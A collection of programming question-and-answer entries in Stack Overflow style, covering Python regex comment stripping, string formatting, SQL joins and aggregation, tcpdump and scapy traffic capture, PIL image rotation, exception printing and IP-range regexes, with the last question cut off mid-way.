I am using python to go through a file and remove any comments. A comment is defined as a hash and anything to the right of it *as long as the hash isn't inside double quotes*. I currently have a solution, but it seems sub-optimal:
```
filelines = []
r = re.compile('(".*?")')
for line in f:
m = r.split(line)
nline = ''
for token in m:
if token.find('#') != -1 and token[0] != '"':
nline += token[:token.find('#')]
break
else:
nline += token
filelines.append(nline)
```
Is there a way to find the first hash not within quotes without for loops (i.e. through regular expressions?)
Examples:
```
' "Phone #":"555-1234" ' -> ' "Phone #":"555-1234" '
' "Phone "#:"555-1234" ' -> ' "Phone "'
'#"Phone #":"555-1234" ' -> ''
' "Phone #":"555-1234" #Comment' -> ' "Phone #":"555-1234" '
```
---
Edit: Here is a pure regex solution created by user2357112. I tested it, and it works great:
```
filelines = []
r = re.compile('(?:"[^"]*"|[^"#])*(#)')
for line in f:
m = r.match(line)
if m != None:
filelines.append(line[:m.start(1)])
else:
filelines.append(line)
```
See his reply for more details on how this regex works.
Edit2: Here's a version of user2357112's code that I modified to account for escape characters (\"). This code also eliminates the 'if' by including a check for end of string ($):
```
filelines = []
r = re.compile(r'(?:"(?:[^"\\]|\\.)*"|[^"#])*(#|$)')
for line in f:
m = r.match(line)
filelines.append(line[:m.start(1)])
``` | ```
r'''(?: # Non-capturing group
"[^"]*" # A quote, followed by not-quotes, followed by a quote
| # or
[^"#] # not a quote or a hash
) # end group
* # Match quoted strings and not-quote-not-hash characters until...
(#) # the comment begins!
'''
```
This is a verbose regex, designed to operate on a single line, so make sure to use the `re.VERBOSE` flag and feed it one line at a time. It'll capture the first unquoted hash as group 1 if there is one, so you can use `match.start(1)` to get the index. It doesn't handle backslash escapes, if you want to be able to put a backslash-escaped quote in a string. This is untested. | You can remove comments using this script:
```
import re
print re.sub(r'(?s)("[^"\\]*(?:\\.[^"\\]*)*")|#[^\n]*', lambda m: m.group(1) or '', '"Phone #"#:"555-1234"')
```
The idea is to capture first parts enclosed in double-quotes and to replace them by themself before searching a sharp:
```
(?s) # the dot matches newlines too
( # open the capture group 1
" # "
[^"\\]* # all characters except a quote or a backslash
# zero or more times
(?: # open a non-capturing group
\\. # a backslash and any character
[^"\\]* #
)* # repeat zero or more times
" # "
) # close the capture group 1
| # OR
#[^\n]* # a sharp and zero or one characters that are not a newline.
``` | Removing hash comments that are not inside quotes | [
"",
"python",
"regex",
"comments",
"quotes",
"strip",
""
] |
Looking at this django code from the djangobook:
```
from django.http import Http404, HttpResponse
import datetime
def hours_ahead(request, offset):
try:
offset = int(offset)
except ValueError:
raise Http404()
dt = datetime.datetime.now() + datetime.timedelta(hours=offset)
html = "<html><body>In %s hour(s), it will be %s.</body></html>" % (offset, dt)
return HttpResponse(html)
```
after the try, it converts offset into an integer, right? and in the line 'datetime.timedelta(hours=offset)', offset is used as an integer, but in the line
'html = "In %s hour(s), it will be %s." % (offset, dt)'
offset is a %s which is a string, right? Or am I miss understanding? I thought %s only can be a string, not an integer? | `%s` calls the `str()` method on its corresponding argument... (similar to `%r` calls `repr()`) - so either of those can be used for *any* object... Unlike `%d` (`%i` is the same) and `%f` for instance which will require appropriate types. | If `offset` is an **integer** (in this particular case, it's not true for any object type), then you can use any of `%s`, `%d`, `%r` and you'll get the same result.
`%d` formats an integer number for display, `%s` calls `str()` on an argument, `%r` calls `repr()`:
```
>>> n = 5
>>> str(n)
'5'
>>> repr(n)
'5'
```
Also see [documentation](http://docs.python.org/2/library/stdtypes.html#string-formatting). | can %s be an integer? *Python code* | [
"",
"python",
""
] |
I have three tables I need to join in order to tell what documents a product needs. Not all documents are needed on each product.
There is a Document table, a Product table, and a DocTracking table that tracks the documents associated with products
```
Product Table
ProdID ProdName
1 Ball
2 Wheel
```
```
DocTracking Table
ProdID DocID
1 1
1 2
2 2
```
I want the join to look like this:
```
ProdID ProdName Needs Word Doc? Needs Excel Doc?
1 Ball Yes Yes
2 Wheel No Yes
```
Any help would be appreciated, if I need to make this into a Stored Procedure, that is fine. | If you have only those documents and they are fix you can use this query:
```
SELECT ProdID, ProdName,
[Needs Word Doc] = CASE WHEN EXISTS(
SELECT 1 FROM Document d INNER JOIN DocTracking dt ON d.DocID=dt.DocID
WHERE dt.ProdID = p.ProdID AND d.[Doc Name] = 'Word Document'
) THEN 'Yes' ELSE 'No' END,
[Needs Excel Doc] = CASE WHEN EXISTS(
SELECT 1 FROM Document d INNER JOIN DocTracking dt ON d.DocID=dt.DocID
WHERE dt.ProdID = p.ProdID AND d.[Doc Name] = ' Excel Spreadsheet'
) THEN 'Yes' ELSE 'No' END
FROM dbo.Product p
```
Of course you could also use the `DocID`, then the query doesn't depend on the name. | ```
select P.ProdID, P.ProdName,
case
when DW.DocID is null then 'Yes'
else 'No'
end as NeedsWordDoc,
case
when DE.DocID is null then 'Yes'
else 'No'
end as NeedsExcelDoc
from Product P
left join DocTracking DTW on DTW.ProdId = P.ProdId
left join Document DW on DW.DocID = DTW.DocID
and DW.Name = 'Word Document'
left join DocTracking DTE on DTE.ProdId = P.ProdId
left join Document DE on DE.DocID = DTE.DocID
and DE.Name = 'Excel Spreadsheet'
``` | SQL Group By Join | [
"",
"sql",
"sql-server",
"join",
"group-by",
""
] |
Is there a way to do
```
tcpdump -i lo -A
```
and have it print all urls, any connections made?
I have done:
```
sudo tcpdump -i lo -A | grep Host:
```
which works great. But I was wondering if there are options to do the same in tcpdump
Finally, is there a way to do this in python without using a sys command or Popen/subprocess | you can use scapy the sniff function and use regex or grep
```
import scapy
tcpdump = sniff(count=5,filter="host 64.233.167.99",prn=lambda x:x.summary())
print tcpdump
```
change the filter for your filter text :)
or maybe you want to save the traffic and see it in wireshark
```
wrpcap("temp.cap",pkts)
``` | tcpdump cannot filter based upon the content of the packets (no deep packet inspection) as it only uses pcacp-filter.
You could improve your performance by only dumping those packages for `incoming TCP connections to your HTTP port`.
```
tcpdump -i lo -A tcp port 80
```
TCPDUMP python: use [Pcapy](http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Pcapy)
Another option is to use [tshark](https://serverfault.com/questions/84750/monitoring-http-traffic-using-tcpdump) | tcpdump to only print urls | [
"",
"python",
"tcpdump",
""
] |
I have the following table `routes` :
```
from | to
---------
abc | cde
cde | abc
klm | xyz
xyz | klm
def | ghi
ghi | mno
mno | ghi
ghi | def
```
I then extract each unique pair of routes (in my project abc -> cde = cde -> abc) :
```
SELECT DISTINCT LEAST(from,to) AS point_a, GREATEST(from,to) AS point_B FROM routes
```
And I end up with the following result :
```
point_a | point_b
-----------------
abc | cde
klm | xyz
def | ghi
ghi | mno
```
Separately I have the following table `location`
```
code | description
------------------
abc | home
cde | beach
ghi | work
xyz | club
klm | friend
...
```
I want to join this table to the result above so that I end up with the following :
```
point_a | point_b | a_description | b_description
-------------------------------------------------
abc | cde | home | beach
klm | xyz | friend | club
...
```
What query would do all this at once ?
I've tried to select unique pairs from `routes` then join the table `location`, or join the table `location` first then sort out the duplicates afterwards, I either get errors or the duplicates are showing up... | You can use `LEFT JOIN` for that:
```
SELECT r.point_a, r.point_b
, l1.description as a_description, l2.description as b_description
FROM
(SELECT DISTINCT LEAST(`from`,`to`) AS point_a
,GREATEST(`from`,`to`) AS point_B
FROM routes) AS r
LEFT JOIN location l1
ON r.point_a = l1.code
LEFT JOIN location l2
ON r.point_b = l2.code;
```
Or `INNER JOIN` if you do not want to get null values for either point
```
SELECT r.point_a, r.point_b
, l1.description as a_description, l2.description as b_description
FROM
(SELECT DISTINCT LEAST(`from`,`to`) AS point_a
,GREATEST(`from`,`to`) AS point_B
FROM routes) AS r
INNER JOIN location l1
ON r.point_a = l1.code
INNER JOIN location l2
ON r.point_b = l2.code;
```
### See [this SQLFiddle](http://sqlfiddle.com/#!2/99a47/1) | One approach:
```
SELECT LEAST(r.from,r.to) AS point_a,
GREATEST(r.from,r.to) AS point_B,
MAX(CASE l.code WHEN LEAST(r.from,r.to) THEN l.description END)
a_description,
MAX(CASE l.code WHEN GREATEST(r.from,r.to) THEN l.description END)
b_description
FROM routes r
JOIN location l ON l.code IN (r.from,r.to)
GROUP BY LEAST(r.from,r.to), GREATEST(r.from,r.to)
```
SQLFiddle [here](http://sqlfiddle.com/#!2/99a47/3). | Query to join a table on another query | [
"",
"mysql",
"sql",
"duplicates",
""
] |
I need to find the next 10 digit number in a query.
I try to use round(n,-1) but it rounds off to nearest 10 digit but I need next 10 digit.
Please help me.
```
select round(5834.6,-1) from dual
```
gives 5830 but i need 5840 | ```
select ceil(5834.6/10)*10 from dual
``` | Then add "5":
```
select round(5834.6 + 5,-1) from dual
``` | how to round off to next 10 in oracle? | [
"",
"sql",
"plsql",
"oracle11g",
""
] |
Lets say I have a table like this:
```
Id*|value
```
For each `Id` I want to count how many times the corresponding `value` exist. Like with this sample data:
```
1, a
2, b
3, a
4, b
5, c
6, a
```
I want:
```
1, a, 3
2, b, 2
3, a, 3
4, b, 2
5, c, 1
6, a, 3
```
This is what I have right now and I believe it is working, but it is dead slow:
```
SELECT t1.Id, t1.value, COUNT(t2.value) FROM `table` AS t1
LEFT JOIN `table` AS t2 ON (t1.value = t2.value)
GROUP by t1.Id
```
My table contains hounded of thousands rows. Any suggestion on how to improve this performance vice? | Try this
```
SELECT t1.Id, t1.value, t2.cnt FROM Table1 AS t1
INNER JOIN
(
SELECT value, COUNT(value) as cnt
FROM Table1 GROUP BY value
) AS t2 ON (t1.value = t2.value)
ORDER BY t1.Id
```
OR
```
SELECT t1.id,t1.value,COUNT(t2.id) AS cnt FROM Table1 AS t1
INNER JOIN Table1 AS t2
ON t1.value = t2.value
GROUP BY t1.id,t1.value
ORDER BY t1.id
``` | Left join it with GROUP BY query running on itself:
SQL Fiddle here - <http://sqlfiddle.com/#!2/5b8f5/18>
```
SELECT
tbl.id, tbl.value, cnts.counts FROM tbl
LEFT JOIN (
SELECT value, COUNT(value) AS counts FROM tbl GROUP BY value
) AS cnts ON (tbl.value = cnts.value)
``` | Count repeated values - help my mysql query is dead slow | [
"",
"mysql",
"sql",
"performance",
""
] |
Basically I'm trying to be able to rotate images via user interface, however I've noticed that the image quality severely decreases upon each rotation. Does anyone know how to fix that? Also when the image is rotated it crops off parts of the image each time.
here are some pictures
of before and after:
<https://i.stack.imgur.com/M5WVJ.jpg>
And here's the code:
```
def onRotate(self):
tanTheta = float(hh)/float(ww)
theta = math.atan(tanTheta) * 57.2957795 # convert to degrees
if theta > 0:
angle = (90 - theta) * -1
clockwise = True
elif theta < 0:
angle = (270 - theta) * -1
clockwise = False
else:
tkMessageBox('Angle not okay', 'Try again!')
rotated_small = photo_small.rotate(angle)
rotated_small.save('small_rotate.jpg')
self.load_imgfile('small_rotate.jpg')
``` | ```
rotated_small = photo_small.rotate(angle, resample=Image.BICUBIC, expand=True)
```
This tells it to use the highest quality interpolation algorithm that it has available, and to expand the image to encompass the full rotated size instead of cropping. The documentation does not say what color the background will be filled with. | An image is a grid of pixels. If you rotate it (and angle isn't a multiple of 90) the rotated grid must be rematched to a new non-rotated grid to display the image. Some loss can't be avoided in this process.
Only option would be to keep the unrotated image somewhere and sum up the angles of multiple rotations and always build the rotated image from the initial unrotated one. | How to preserve Image Quality when rotating with PIL | [
"",
"python",
"python-imaging-library",
""
] |
I have 3 tables..
`House1` `House2` `results`
```
house1
ID, Name, Monday, Tuesday
1 john 1 1
2 jack 1 0
```
and
```
House2
ID, Name, Monday, Tuesday
3 Dan 0 0
1 John 1 0
```
and I want to fill the `results` table, something like this:
```
results
ID, Name, Total
1 john 3
2 jack 1
3 dan 0
```
im using the IIF() to count the days.. but it made dupicate rows
im using something similar to:
```
INSERT INTO results (ID, name, total)
SELECT ID, name, IIf([house1.monday]>0,1,0)+
IIf([house2.monday]>0,1,0)+
IIf([house1.tuesday]>0,1,0)+
IIF([house2.tuesday]>0,1,0) as TOTAL
FROM house1,house2
WHERE House1.ID = House2.ID
```
that clearly doesn't work, because it only insert the data of `john`. | You recognize the problem with your query. The inner join only keeps matching rows.
You can keep all rows by using `union all` instead. The following calculates the `total` for each table and then uses `aggregation` to sum them:
```
INSERT INTO results(ID, name, total)
SELECT ID, name, SUM(Total) as TOTAL
FROM ((select h1.id, IIf([h1.monday]>0,1,0) + IIf([h1.tuesday]>0,1,0) as Total
from house1 h1
) union all
(select h2.id, IIf([h2.monday]>0,1,0) + IIf([h2.tuesday]>0,1,0) as Total
from house2 h2
)
) h
group by id, name;
```
EDIT
You changed the question in your comment. However, you would just do the same thing, defining the columns that you need in the subquery:
```
INSERT INTO results(ID, name, totalMonday, totalTuesday, total)
SELECT ID, name, SUM(Monday), SUM(Tuesday), SUM(Monday)+Sum(Tuesday) as TOTAL
FROM ((select h1.id, IIf([h1.monday]>0,1,0) as Monday, IIf([h1.tuesday]>0,1,0) as Tuesday
from house1 h1
) union all
(select h2.id, IIf([h2.monday]>0,1,0) as Monday, IIf([h2.tuesday]>0,1,0) as Tuesday
from house2 h2
)
) h
group by id, name;
``` | What about something like
```
SELECT ID, Name, SUM(Monday)+SUM(Tuesday) as Total
FROM
(
SELECT ID, Name, Monday, Tuesday
FROM House1
Union ALL
SELECT ID, Name, Monday, Tuesday
FROM House2
) a
Group BY a.ID, a.Name
``` | Sum data in two tables and insert it in another one without duplucate ID | [
"",
"sql",
"database",
"ms-access",
""
] |
I have a txt file contains more than 100 thousands lines, and for each line I want to create a XML tree. BUT all lines are sharing the same root.
Here the txt file:
```
LIBRARY:
1,1,1,1,the
1,2,1,1,world
2,1,1,2,we
2,5,2,1,have
7,3,1,1,food
```
The desired output:
```
<LIBRARY>
<BOOK ID ="1">
<CHAPTER ID ="1">
<SENT ID ="1">
<WORD ID ="1">the</WORD>
</SENT>
</CHAPTER>
</BOOK>
<BOOK ID ="1">
<CHAPTER ID ="2">
<SENT ID ="1">
<WORD ID ="1">world</WORD>
</SENT>
</CHAPTER>
</BOOK>
<BOOK ID ="2">
<CHAPTER ID ="1">
<SENT ID ="1">
<WORD ID ="2">we</WORD>
</SENT>
</CHAPTER>
</BOOK>
<BOOK ID ="2">
<CHAPTER ID ="5">
<SENT ID ="2">
<WORD ID ="1">have</WORD>
</SENT>
</CHAPTER>
</BOOK>
<BOOK ID ="7">
<CHAPTER ID ="3">
<SENT ID ="1">
<WORD ID ="1">food</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
```
I use Element tree for converting txt file to xml file, this is the code I run
```
def expantree():
lines = txtfile.readlines()
for line in lines:
split_line = line.split(',')
BOOK.set( 'ID ', split_line[0])
CHAPTER.set( 'ID ', split_line[1])
SENTENCE.set( 'ID ', split_line[2])
WORD.set( 'ID ', split_line[3])
WORD.text = split_line[4]
tree = ET.ElementTree(Root)
tree.write(xmlfile)
```
Okay, the code is working but i didnt get the desired output, I got the following:
```
<LIBRARY>
<BOOK ID ="1">
<CHAPTER ID ="1">
<SENT ID ="1">
<WORD ID ="1">the</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
<LIBRARY>
<BOOK ID ="1">
<CHAPTER ID ="2">
<SENT ID ="1">
<WORD ID ="1">world</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
<LIBRARY>
<BOOK ID ="2">
<CHAPTER ID ="1">
<SENT ID ="1">
<WORD ID ="2">we</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
<LIBRARY>
<BOOK ID ="2">
<CHAPTER ID ="5">
<SENT ID ="2">
<WORD ID ="1">have</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
<LIBRARY>
<BOOK ID ="7">
<CHAPTER ID ="3">
<SENT ID ="1">
<WORD ID ="1">food</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
```
How to unify the tree root , so instead of getting many root tag I get one root tag? | One method would be to create the full tree and print it. I used the following code:
```
from lxml import etree as ET
def create_library(lines):
library = ET.Element('LIBRARY')
for line in lines:
split_line = line.split(',')
library.append(create_book(split_line))
return library
def create_book(split_line):
book = ET.Element('BOOK',ID=split_line[0])
book.append(create_chapter(split_line))
return book
def create_chapter(split_line):
chapter = ET.Element('CHAPTER',ID=split_line[1])
chapter.append(create_sentence(split_line))
return chapter
def create_sentence(split_line):
sentence = ET.Element('SENT',ID=split_line[2])
sentence.append(create_word(split_line))
return sentence
def create_word(split_line):
word = ET.Element('WORD',ID=split_line[3])
word.text = split_line[4]
return word
```
Then your code to create the file would look like:
```
def expantree():
lines = txtfile.readlines()
library = create_library(lines)
ET.ElementTree(lib).write(xmlfile)
```
If you don't want to load the entire tree in memory (you mentioned there are more than 100 thousand lines), you can manually create the tag, write each book one at a time, then add the tag. In this case your code would look like:
```
def expantree():
lines = txtfile.readlines()
f = open(xmlfile,'wb')
f.write('<LIBRARY>')
for line in lines:
split_line = line.split(',')
book = create_book(split_line)
f.write(ET.tostring(book))
f.write('</LIBRARY>')
f.close()
```
I don't have that much experience with lxml, so there may be more elegant solutions, but both of these work. | Here is a suggestion that uses lxml (tested with Python 2.7). The code can easily be adapted to work with ElementTree too, but it's harder to get nice pretty-printed output (see <https://stackoverflow.com/a/16377996/407651> for some more on this).
The input file is library.txt and the output file is library.xml.
```
from lxml import etree
lines = open("library.txt").readlines()
library = etree.Element('LIBRARY') # The root element
# For each line with data in the input file, create a BOOK/CHAPTER/SENT/WORD structure
for line in lines:
values = line.split(',')
if len(values) == 5:
book = etree.SubElement(library, "BOOK")
book.set("ID", values[0])
chapter = etree.SubElement(book, "CHAPTER")
chapter.set("ID", values[1])
sent = etree.SubElement(chapter, "SENT")
sent.set("ID", values[2])
word = etree.SubElement(sent, "WORD")
word.set("ID", values[3])
word.text = values[4].strip()
etree.ElementTree(library).write("library.xml", pretty_print=True)
``` | creating a xml file with For Loop in python | [
"",
"python",
"xml",
"elementtree",
""
] |
I am working with a database that stores dates in multiple fields as integers (mock field names):
* Century: CC01: 20
* Year: YR01: 13
* Month: MO01: 7
* Day: DY01: 22
I can formulate a date as so: `DATE((CC01 * 100 + YR01) || '-' || MO01 || '-' || DY01)`
The problem is when I need to filter over a range of dates. For example, if I want to select the past 90 days, I could write something like this...
`WHERE DATE((CC01 * 100 + YR01) || '-' || MO01 || '-' || DY01) >= CURRENT DATE - 90 DAYS`
The problem here is performance. I am searching for an efficient way of writing this formula that keeps functions limited to the right-hand side of the equation.
Here is an example that would work with today's date (I don't need to worry about century, and I am leaving out some detail):
`WHERE CC01 = 20 AND YR01 >= RIGHT(YEAR(CURRENT DATE - 7 DAYS),2) AND MO01 >= MONTH(CURRENT DATE - 7 DAYS) AND DY01 >= DAY(CURRENT DATE - 7 DAYS)`
This only works because going back 7 days keeps us in the current month and year. I would also prefer not to have a huge set of ANDs and ORs (if possible). | I believe I may have found a solution.
```
CC01 = 20
AND
YR01 >= RIGHT(YEAR(CURRENT DATE - 220 DAYS),2)
AND NOT
(
YR01 = RIGHT(YEAR(CURRENT DATE - 220 DAYS),2)
AND
MO01 = MONTH(CURRENT DATE - 220 DAYS)
AND
DY01 < DAY(CURRENT DATE - 220 DAYS)
)
AND NOT
(
YR01 = RIGHT(YEAR(CURRENT DATE - 220 DAYS),2)
AND
MO01 < MONTH(CURRENT DATE - 220 DAYS)
)
``` | Do you have access to modify the DB schema?
If so you could consider a 'generated column' for the date :
<https://www.ibm.com/developerworks/community/blogs/SQLTips4DB2LUW/entry/expression_generated_columns?lang=en> | Filter by date range when the date is split into multiple fields | [
"",
"sql",
"db2",
""
] |
I have 2D list in python
```
list = [[9, 2, 7], [9, 7], [2, 7], [1, 0], [0, 5, 4]]
```
I would like to get union of list items if there occurs any intersection. For example `[9, 2, 7]`, `[9, 7]`, `[2, 7]` has intersection of more than one digit. The union of this would be `[9,2,7]`.
How can i get the final list as follows in efficient way ?
```
finalList = [[9,2,7], [0, 1, 5, 4]]
```
*N.B. order of numbers is not important.* | You have a graph problem. You want to build connected components in a graph whose vertices are elements of your sublists, and where two vertices have an edge between them if they're elements of the same sublist. You could build an adjacency-list representation of your input and run a graph search algorithm over it, or you could iterate over your input and build disjoint sets. Here's a slightly-modified connected components algorithm I wrote up for [a similar question](https://stackoverflow.com/questions/17482944/find-duplicate-items-within-a-list-of-list-of-tuples-python/17483756#17483756):
```
import collections
# build an adjacency list representation of your input
graph = collections.defaultdict(set)
for l in input_list:
if l:
first = l[0]
for element in l:
graph[first].add(element)
graph[element].add(first)
# breadth-first search the graph to produce the output
output = []
marked = set() # a set of all nodes whose connected component is known
for node in graph:
if node not in marked:
# this node is not in any previously seen connected component
# run a breadth-first search to determine its connected component
frontier = set([node])
connected_component = []
while frontier:
marked |= frontier
connected_component.extend(frontier)
# find all unmarked nodes directly connected to frontier nodes
# they will form the new frontier
new_frontier = set()
for node in frontier:
new_frontier |= graph[node] - marked
frontier = new_frontier
output.append(tuple(connected_component))
``` | Here is a theoretical answer: This is a **connected component** problem: you build a graph as follows:
* there is a vertex for each set is the list
* there is an edge between two sets when they have a common value.
what you want is the union of the [connected components](http://en.wikipedia.org/wiki/Connected_component_%28graph_theory%29) of the graph. | How can i get union of 2D list items when there occurs any intersection (in efficient way)? | [
"",
"python",
"list",
"set",
"intersection",
""
] |
## The goal
Convert `99999999` into `99999-999`.
## The problem
I do not know the syntax.
## What I already thought about
I was thinking to use`FORMAT()` function — but I'm working with *INT* instead of *DECIMAL*.
## My query
```
Select city.ZipCode As zipCode
From app_cities As city
Where city.Id = 1
```
So, that's it. Someone has any idea to me? | The problem you're going to have with zip codes is that there can be a leading 0. So the length of the zip code can either be 7 or 8 digits.
So, the zipcode might be 02323-213 or 12133-333. As an int, you will lose the first digit.
Taking what Jurgen D already posted and modifying it.
```
SELECT insert(LPAD(zipcode, 8, '0'), 6, 0, '-') from zipcodes;
```
[SQL Fiddle](http://www.sqlfiddle.com/#!2/2e255/1) | Use [INSERT()](http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_insert)
```
select insert(ZipCode , 6, 0, '-') As zipCode
from app_cities As city
where Id = 1
```
## [SQLFiddle demo](http://sqlfiddle.com/#!2/d41d8/16786) | Make a simple format (MySQL) | [
"",
"mysql",
"sql",
""
] |
I followed this to pass functions as arguments:
[Passing functions with arguments to another function in Python?](https://stackoverflow.com/questions/803616/passing-functions-with-arguments-to-another-function-in-python)
However, I could not figure out how to pass function with its own arguments as names parameters
```
def retry(func, *args):
func(*args)
def action(args):
do something
retry(action, arg1, namedArg=arg2)
```
Here I get an exception:
```
TypeError: retry() got an unexpected keyword argument 'namedArg'
```
Normally, I can do:
```
action(arg1, namedArg=arg2)
```
Please help/ | `*args` and it's sibling `**kwargs` are the names generally used for extra arguments and key word arguments. You are passing a kew word argument when you pass `namedArg=arg2`.
So, try this instead:
```
def retry(func, *args, **kwargs):
func(*args, **kwargs)
def action(*args, **kwargs):
do something
retry(action, arg1, namedArg=arg2)
```
If you instead use
```
def action(args, kwargs):
do something
```
Then you will end up with `args` as a list of arguments and `kwargs` as a dictionary of key word arguments, so in your case
```
args = [arg1]
kwargs = {'namedArg':arg2}
``` | Read this, [keyword arguments in python doc](http://docs.python.org/2/tutorial/controlflow.html#keyword-arguments).
As the error clearly states that `got an unexpected keyword argument 'namedArg'`. where as you are providing only arguments in \*args.
You will find plenty of examples to understand keyword arguments. | passing functions as argument with named parameters | [
"",
"python",
""
] |
I'm trying to get a subset of data based on the latest id and dates. It seems that when selecting other fields in the table they are not in sync with the max id and dates returned.
Any idea how I can fix this?
MySQL:
```
SELECT MAX(m.id) as id, m.sender_id, m.receiver_id, MAX(m.date) as date, m.content, l.username, p.gender
FROM messages m
LEFT JOIN login_users l on l.user_id = m.sender_id
LEFT JOIN profiles p ON p.user_id = l.user_id
WHERE m.receiver_id=3
GROUP BY m.sender_id ORDER BY date DESC LIMIT 0, 7
```
The data for content isn't the correct one. It seems to be returning random content and not the content that is tied to the row for max id and max date.
Do I need to do some sort of sub select to fix this? | To answer the question in the title, "Why doesn't my content field match my MAX(id) field", that's because there is no guarantee that the values returned for the non-aggregate fields will be from the row where the MAX value is found. This is the documented behavior, and this is what we expect.
Other DBMS would throw an error on the statement, MySQL is just more lax, and you are getting values from one row, but it's not guaranteed to be the row that either of the MAX values (id or date) is found on.
You have two separate aggregate expression `MAX(m.id)` and `MAX(m.date)`. Note that there is no guarantee that those values will come from the same row.
The rule in other databases is that every non-aggregate expression in the SELECT list needs to appear in the GROUP BY. (MySQL is more lax about that, and doesn't make that a requirement.)
One way to "fix" the query so that it does return values from the row with the MAX value is to use an inline view (query) that gets the `MAX(id)` grouped by what you want to GROUP BY, and then a JOIN back to the original table to get other values on the row.
From your statement it's not clear what result set you want returned. If you want the row that has the maximum id and you also want the row with maximum date, then you could something like this:
```
SELECT m.id
, m.sender_id
, m.receiver_id
, m.date
, m.content
, l.username
, p.gender
FROM ( SELECT t.sender_id
, t.receiver_id
, MAX(t.id) AS max_id
, MAX(t.date) AS max_date
FROM messages t
WHERE t.receiver_id=3
GROUP
BY t.sender_id
, t.receiver_id
) s
JOIN messages m
ON m.sender_id = s.sender_id
AND m.receiver_id = s.receiver_id
AND ( m.id = s.max_id OR m.date = s.max_date)
LEFT
JOIN login_users l on l.user_id = m.sender_id
LEFT
JOIN profiles p ON p.user_id = l.user_id
ORDER BY m.date DESC LIMIT 0, 7
```
The inline view aliased as "s" returns the max values, and then that gets joined back to the messages table, aliased as "m".
**NOTE**
In most cases, we find that a `JOIN (query)` will perform better than an `IN (query)`, because of the different access plans. You can see the difference in plans with an EXPLAIN.
For performance, you'll want an index
```
... ON messages (`receiver_id`, `sender_id`, `id`, `date`)
```
There's an equality predicate on receiver\_id, so that should be the leading column, to get a range scan (instead of a full scan). You want the `sender_id` column next, because that should allow MySQL to avoid a "Using filesort" operation to get the rows grouped. The `id` and `date` columns are included, so that the inline view query can be satisfied entirely from the index pages without a need to access the pages in the table. (The EXPLAIN should show "`Using where; Using index`".)
That same index should also suitable for the outer query, though it does need to access the "`content`" column from the table pages, so the EXPLAIN will not show "Using index" for that step. (It's likely that the "`content`" column is much longer than we would want in the index.) | Well, you *could* probably solve it without a subselect, but doing one is fairly straight forward. Something like this should work, just make the subselect return the id's of the interesting rows in messages, and get the data for only them.
```
SELECT m.id as id, m.sender_id, m.receiver_id, m.date as date,
m.content, l.username, p.gender
FROM messages m
LEFT JOIN login_users l on l.user_id = m.sender_id
LEFT JOIN profiles p ON p.user_id = l.user_id
WHERE m.id IN (
SELECT max(id) FROM messages
WHERE receiver_id=3
GROUP BY sender_id
)
ORDER BY date DESC
LIMIT 0, 7
```
The reason that your original query does not match up fields is that `GROUP BY` really requires aggregate functions (like MAX/MIN/SUM/...) applied to every field you select that's not grouped by. The reason the query even runs is that MySQL does not enforce that, but instead returns indeterminate fields from any row that is matching. Afaik, all other SQL RDBMS' refuse to run the query.
EDIT: As for performance, a few indexes that are likely to help are;
```
CREATE INDEX ix_inner ON messages(receiver_id, sender_id, id);
CREATE INDEX ix_login_users ON login_users(user_id);
CREATE INDEX ix_profiles ON profiles(user_id);
``` | Why doesn't my content field match my MAX(id) field in MySQL? | [
"",
"mysql",
"sql",
""
] |
This is a fairly simple question, but I am looking for the most Pythonic method of doing it. I have two lists:
```
a = [..., 5, 7, 4, 8]
b = [a, b, c, d]
```
I need to combine these two lists, overwriting the last 3 numbers of list `a`, such that it produces the following list:
```
c = [..., 5, a, b, c, d]
```
The `...` represent a varying length set of numbers, so ideally the method to do this would use a reference from the end of the list rather than the start (i.e. something along the lines of `a[-3]` rather than `a[27]`).
I have tried various `for` loops to cycle through the lists until it reaches the correct point, but this seems highly inefficient and I'm sure there must be a cleaner way of doing it.
Thanks for your help, much appreciated. | If you need a *new* list, use slicing and concatenation:
```
c = a[:-3] + b
```
Python slice notation allows for *negative* indices, interpreted as relative to the length of the list. `[:-3]` is the same as `[0:len(a) - 3]`; slicing everything but the last three elements.
You can also alter `a` in-place by assigning to a slice:
```
a[-3:] = b
```
replaces the last 3 elements of `a` with all elements of `b`. | First of all, I'd save the value 3 as a constant (to avoid magic numbers).
Then I'd simply use:
```
NUMBER_FROM_END = 3
c = a[:-NUMBER_FROM_END] + b
``` | Python: Combine two lists, overwriting the final few lines of the first list | [
"",
"python",
"list",
"concatenation",
""
] |
I'm aware that it's possible to ignore exceptions in Python using try...except statements. Is it possible to ignore exceptions in Python when they occur, but still print them?
I tried ignoring the exception here, and therefore, the exception was not printed when it was encountered:
```
try:
num = 0
if num == 0:
raise Exception("Num must not be 0!")
except Exception:
pass
'''The exception is ignored, and is not printed.'''
```
I've written a simple source-to-source compiler that has a lot of exceptions like these, and I'm not sure how I can ignore the exceptions while still printing them. How can I ensure that the exceptions are printed to the console even when they are being ignored? | You can print an exception like this.
```
try:
x = 1 / 0
except Exception as e:
print e
```
**EDIT:**
As user1354557, gcbirzan, and Jonathan Vanasco pointed out, you can use the [`traceback`](http://docs.python.org/2/library/traceback.html) and [`logging`](http://docs.python.org/2/library/logging.html) modules to get more precise error messages. Error messages printed out these ways will be more verbose, which is (usually) a good thing.
```
import traceback
try:
x = 1 / 0
except Exception as e:
print traceback.format_exc() # I prefer this to traceback.print_exc()
import logging
try:
x = 1 / 0
except Exception as e:
logging.exception(e)
``` | If you want a printout of the stack trace, you can use the [`traceback`](http://docs.python.org/2/library/traceback.html) module:
```
import traceback
try:
0/0
except:
traceback.print_exc()
```
This would print something like:
```
Traceback (most recent call last):
File "example.py", line 3, in <module>
0/0
ZeroDivisionError: integer division or modulo by zero
```
Is this what you're looking for? | In Python, is it possible to print exceptions even when they are being ignored? | [
"",
"python",
""
] |
I want to match IP range using a Python regex.
For Ex. the google bot IP range as follow
66.249.64.0 - 66.249.95.255
```
re.compile(r"66.249.\d{1,3}\.\d{1,3}$")
```
